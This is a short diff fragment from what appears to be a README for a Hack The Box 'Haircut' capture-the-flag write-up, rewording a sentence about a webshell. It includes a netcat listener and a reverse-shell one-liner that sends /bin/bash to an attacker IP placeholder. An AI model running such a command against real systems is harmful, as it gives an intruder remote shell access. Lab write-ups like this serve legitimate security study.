notsag-dev/htb-haircut/README.md

 nc -lvp 4444
 ```

-The webshell allows the user to execute in a shell.
+The webshell allows the user to execute in the target system.
 Connect to the attacker as follows:
 ```
 nc $IP_ATTACKER 4444 -e /bin/bash
 ```